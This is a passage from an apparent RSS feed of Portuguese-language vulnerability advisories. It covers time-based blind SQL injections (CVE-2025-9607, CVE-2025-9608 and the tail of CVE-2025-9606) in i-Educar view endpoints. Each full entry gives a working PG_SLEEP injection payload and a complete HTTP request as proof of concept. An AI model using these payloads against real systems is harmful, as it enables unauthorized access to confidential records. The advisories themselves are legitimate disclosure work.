&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeração de banco de dados (esquemas, tabelas, usuários, versões).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9606.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9606.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 29 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9607</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9607/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9607/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9607-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-moduletabelaarredondamentoview&amp;#34;&amp;gt;CVE-2025-9607: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;/module/TabelaArredondamento/view&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9607&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9607&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/module/TabelaArredondamento/view&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9607-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-moduletabelaarredondamentoview&amp;#34;&amp;gt;CVE-2025-9607: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;/module/TabelaArredondamento/view&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9607&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9607&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/module/TabelaArredondamento/view&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/module/TabelaArredondamento/view&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#39;&#43;AND&#43;7097=(SELECT&#43;7097&#43;FROM&#43;PG_SLEEP(5))&#43;AND&#43;&amp;amp;#39;WqeR&amp;amp;#39;=&amp;amp;#39;WqeR
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;exemplo-de-requisição&amp;#34;&amp;gt;Exemplo de Requisição
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /module/TabelaArredondamento/view?id=1&amp;amp;#39;&#43;AND&#43;7097=(SELECT&#43;7097&#43;FROM&#43;PG_SLEEP(5))&#43;AND&#43;&amp;amp;#39;WqeR&amp;amp;#39;=&amp;amp;#39;WqeR HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://localhost/module/TabelaArredondamento/index?tipo_nota=1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: [COOKIE]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Este payload introduz um atraso de tempo, demonstrando a capacidade de executar consultas SQL arbitrárias.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9607/image.png&amp;#34;
	width=&amp;#34;1118&amp;#34;
	height=&amp;#34;1020&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9607/image_hu_cf5abac93c459033.png 480w, /p/cve-2025-9607/image_hu_36a33a0596047057.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;109&amp;#34;
		data-flex-basis=&amp;#34;263px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida do payload SQL.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeração de banco de dados (esquemas, tabelas, usuários, versões).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9607.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9607.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 29 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9608</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9608/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9608/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9608-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-moduleformulamediaview&amp;#34;&amp;gt;CVE-2025-9608: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;/module/FormulaMedia/view&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9608&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9608&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/module/FormulaMedia/view&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9608-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-moduleformulamediaview&amp;#34;&amp;gt;CVE-2025-9608: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;/module/FormulaMedia/view&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9608&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9608&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/module/FormulaMedia/view&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/module/FormulaMedia/view&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#39;&#43;AND&#43;7097=(SELECT&#43;7097&#43;FROM&#43;PG_SLEEP(5))&#43;AND&#43;&amp;amp;#39;WqeR&amp;amp;#39;=&amp;amp;#39;WqeR
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;exemplo-de-requisição&amp;#34;&amp;gt;Exemplo de Requisição
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /module/FormulaMedia/view?id=1%27&#43;AND&#43;7097=(SELECT&#43;7097&#43;FROM&#43;PG_SLEEP(5))&#43;AND&#43;%27WqeR%27=%27WqeR HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
